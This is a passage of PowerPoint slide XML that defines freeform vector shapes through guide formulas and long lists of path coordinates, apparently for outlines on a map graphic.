                  <a:gd name="T45" fmla="*/ 33 h 139"/>
                  <a:gd name="T46" fmla="*/ 44 w 157"/>
                  <a:gd name="T47" fmla="*/ 34 h 139"/>
                  <a:gd name="T48" fmla="*/ 42 w 157"/>
                  <a:gd name="T49" fmla="*/ 27 h 139"/>
                  <a:gd name="T50" fmla="*/ 31 w 157"/>
                  <a:gd name="T51" fmla="*/ 29 h 139"/>
                  <a:gd name="T52" fmla="*/ 15 w 157"/>
                  <a:gd name="T53" fmla="*/ 27 h 139"/>
                  <a:gd name="T54" fmla="*/ 12 w 157"/>
                  <a:gd name="T55" fmla="*/ 18 h 139"/>
                  <a:gd name="T56" fmla="*/ 2 w 157"/>
                  <a:gd name="T57" fmla="*/ 14 h 139"/>
                  <a:gd name="T58" fmla="*/ 5 w 157"/>
                  <a:gd name="T59" fmla="*/ 8 h 139"/>
                  <a:gd name="T60" fmla="*/ 19 w 157"/>
                  <a:gd name="T61" fmla="*/ 0 h 139"/>
                  <a:gd name="T62" fmla="*/ 35 w 157"/>
                  <a:gd name="T63" fmla="*/ 5 h 139"/>
                  <a:gd name="T64" fmla="*/ 47 w 157"/>
                  <a:gd name="T65" fmla="*/ 13 h 139"/>
                  <a:gd name="T66" fmla="*/ 46 w 157"/>
                  <a:gd name="T67" fmla="*/ 23 h 139"/>
                  <a:gd name="T68" fmla="*/ 49 w 157"/>
                  <a:gd name="T69" fmla="*/ 33 h 139"/>
                  <a:gd name="T70" fmla="*/ 53 w 157"/>
                  <a:gd name="T71" fmla="*/ 39 h 139"/>
                  <a:gd name="T72" fmla="*/ 56 w 157"/>
                  <a:gd name="T73" fmla="*/ 36 h 139"/>
                  <a:gd name="T74" fmla="*/ 61 w 157"/>
                  <a:gd name="T75" fmla="*/ 46 h 139"/>
                  <a:gd name="T76" fmla="*/ 70 w 157"/>
                  <a:gd name="T77" fmla="*/ 46 h 139"/>
                  <a:gd name="T78" fmla="*/ 85 w 157"/>
                  <a:gd name="T79" fmla="*/ 30 h 139"/>
                  <a:gd name="T80" fmla="*/ 96 w 157"/>
                  <a:gd name="T81" fmla="*/ 27 h 139"/>
                  <a:gd name="T82" fmla="*/ 105 w 157"/>
                  <a:gd name="T83" fmla="*/ 17 h 139"/>
                  <a:gd name="T84" fmla="*/ 135 w 157"/>
                  <a:gd name="T85" fmla="*/ 29 h 139"/>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57"/>
                  <a:gd name="T130" fmla="*/ 0 h 139"/>
                  <a:gd name="T131" fmla="*/ 157 w 157"/>
                  <a:gd name="T132" fmla="*/ 139 h 139"/>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57" h="139">
                    <a:moveTo>
                      <a:pt x="155" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36312" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4622" y="2917"/>
                <a:ext cx="101" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 101"/>
                  <a:gd name="T1" fmla="*/ 18 h 119"/>
                  <a:gd name="T2" fmla="*/ 28 w 101"/>
                  <a:gd name="T3" fmla="*/ 17 h 119"/>
                  <a:gd name="T4" fmla="*/ 33 w 101"/>
                  <a:gd name="T5" fmla="*/ 9 h 119"/>
                  <a:gd name="T6" fmla="*/ 46 w 101"/>
                  <a:gd name="T7" fmla="*/ 13 h 119"/>
                  <a:gd name="T8" fmla="*/ 59 w 101"/>
                  <a:gd name="T9" fmla="*/ 14 h 119"/>
                  <a:gd name="T10" fmla="*/ 82 w 101"/>
                  <a:gd name="T11" fmla="*/ 15 h 119"/>
                  <a:gd name="T12" fmla="*/ 93 w 101"/>
                  <a:gd name="T13" fmla="*/ 9 h 119"/>
                  <a:gd name="T14" fmla="*/ 96 w 101"/>
                  <a:gd name="T15" fmla="*/ 4 h 119"/>
                  <a:gd name="T16" fmla="*/ 101 w 101"/>
                  <a:gd name="T17" fmla="*/ 2 h 119"/>
                  <a:gd name="T18" fmla="*/ 99 w 101"/>
                  <a:gd name="T19" fmla="*/ 9 h 119"/>
                  <a:gd name="T20" fmla="*/ 88 w 101"/>
                  <a:gd name="T21" fmla="*/ 22 h 119"/>
                  <a:gd name="T22" fmla="*/ 73 w 101"/>
                  <a:gd name="T23" fmla="*/ 24 h 119"/>
                  <a:gd name="T24" fmla="*/ 52 w 101"/>
                  <a:gd name="T25" fmla="*/ 21 h 119"/>
                  <a:gd name="T26" fmla="*/ 34 w 101"/>
                  <a:gd name="T27" fmla="*/ 20 h 119"/>
                  <a:gd name="T28" fmla="*/ 23 w 101"/>
                  <a:gd name="T29" fmla="*/ 24 h 119"/>
                  <a:gd name="T30" fmla="*/ 19 w 101"/>
                  <a:gd name="T31" fmla="*/ 34 h 119"/>
                  <a:gd name="T32" fmla="*/ 23 w 101"/>
                  <a:gd name="T33" fmla="*/ 42 h 119"/>
                  <a:gd name="T34" fmla="*/ 29 w 101"/>
                  <a:gd name="T35" fmla="*/ 50 h 119"/>
                  <a:gd name="T36" fmla="*/ 38 w 101"/>
                  <a:gd name="T37" fmla="*/ 51 h 119"/>
                  <a:gd name="T38" fmla="*/ 47 w 101"/>
                  <a:gd name="T39" fmla="*/ 43 h 119"/>
                  <a:gd name="T40" fmla="*/ 55 w 101"/>
                  <a:gd name="T41" fmla="*/ 43 h 119"/>
                  <a:gd name="T42" fmla="*/ 66 w 101"/>
                  <a:gd name="T43" fmla="*/ 38 h 119"/>
                  <a:gd name="T44" fmla="*/ 73 w 101"/>
                  <a:gd name="T45" fmla="*/ 41 h 119"/>
                  <a:gd name="T46" fmla="*/ 65 w 101"/>
                  <a:gd name="T47" fmla="*/ 44 h 119"/>
                  <a:gd name="T48" fmla="*/ 56 w 101"/>
                  <a:gd name="T49" fmla="*/ 53 h 119"/>
                  <a:gd name="T50" fmla="*/ 46 w 101"/>
                  <a:gd name="T51" fmla="*/ 58 h 119"/>
                  <a:gd name="T52" fmla="*/ 41 w 101"/>
                  <a:gd name="T53" fmla="*/ 58 h 119"/>
                  <a:gd name="T54" fmla="*/ 48 w 101"/>
                  <a:gd name="T55" fmla="*/ 65 h 119"/>
                  <a:gd name="T56" fmla="*/ 56 w 101"/>
                  <a:gd name="T57" fmla="*/ 80 h 119"/>
                  <a:gd name="T58" fmla="*/ 59 w 101"/>
                  <a:gd name="T59" fmla="*/ 91 h 119"/>
                  <a:gd name="T60" fmla="*/ 63 w 101"/>
                  <a:gd name="T61" fmla="*/ 98 h 119"/>
                  <a:gd name="T62" fmla="*/ 52 w 101"/>
                  <a:gd name="T63" fmla="*/ 100 h 119"/>
                  <a:gd name="T64" fmla="*/ 44 w 101"/>
                  <a:gd name="T65" fmla="*/ 104 h 119"/>
                  <a:gd name="T66" fmla="*/ 45 w 101"/>
                  <a:gd name="T67" fmla="*/ 94 h 119"/>
                  <a:gd name="T68" fmla="*/ 34 w 101"/>
                  <a:gd name="T69" fmla="*/ 84 h 119"/>
                  <a:gd name="T70" fmla="*/ 37 w 101"/>
                  <a:gd name="T71" fmla="*/ 75 h 119"/>
                  <a:gd name="T72" fmla="*/ 27 w 101"/>
                  <a:gd name="T73" fmla="*/ 72 h 119"/>
                  <a:gd name="T74" fmla="*/ 26 w 101"/>
                  <a:gd name="T75" fmla="*/ 84 h 119"/>
                  <a:gd name="T76" fmla="*/ 26 w 101"/>
                  <a:gd name="T77" fmla="*/ 103 h 119"/>
                  <a:gd name="T78" fmla="*/ 23 w 101"/>
                  <a:gd name="T79" fmla="*/ 111 h 119"/>
                  <a:gd name="T80" fmla="*/ 16 w 101"/>
                  <a:gd name="T81" fmla="*/ 118 h 119"/>
                  <a:gd name="T82" fmla="*/ 10 w 101"/>
                  <a:gd name="T83" fmla="*/ 113 h 119"/>
                  <a:gd name="T84" fmla="*/ 13 w 101"/>
                  <a:gd name="T85" fmla="*/ 101 h 119"/>
                  <a:gd name="T86" fmla="*/ 13 w 101"/>
                  <a:gd name="T87" fmla="*/ 87 h 119"/>
                  <a:gd name="T88" fmla="*/ 6 w 101"/>
                  <a:gd name="T89" fmla="*/ 84 h 119"/>
                  <a:gd name="T90" fmla="*/ 0 w 101"/>
                  <a:gd name="T91" fmla="*/ 73 h 119"/>
                  <a:gd name="T92" fmla="*/ 8 w 101"/>
                  <a:gd name="T93" fmla="*/ 61 h 119"/>
                  <a:gd name="T94" fmla="*/ 9 w 101"/>
                  <a:gd name="T95" fmla="*/ 49 h 119"/>
                  <a:gd name="T96" fmla="*/ 15 w 101"/>
                  <a:gd name="T97" fmla="*/ 40 h 119"/>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01"/>
                  <a:gd name="T148" fmla="*/ 0 h 119"/>
                  <a:gd name="T149" fmla="*/ 101 w 101"/>
                  <a:gd name="T150" fmla="*/ 119 h 119"/>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01" h="119">
                    <a:moveTo>
                      <a:pt x="16" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="110"/>
                    </a:lnTo>
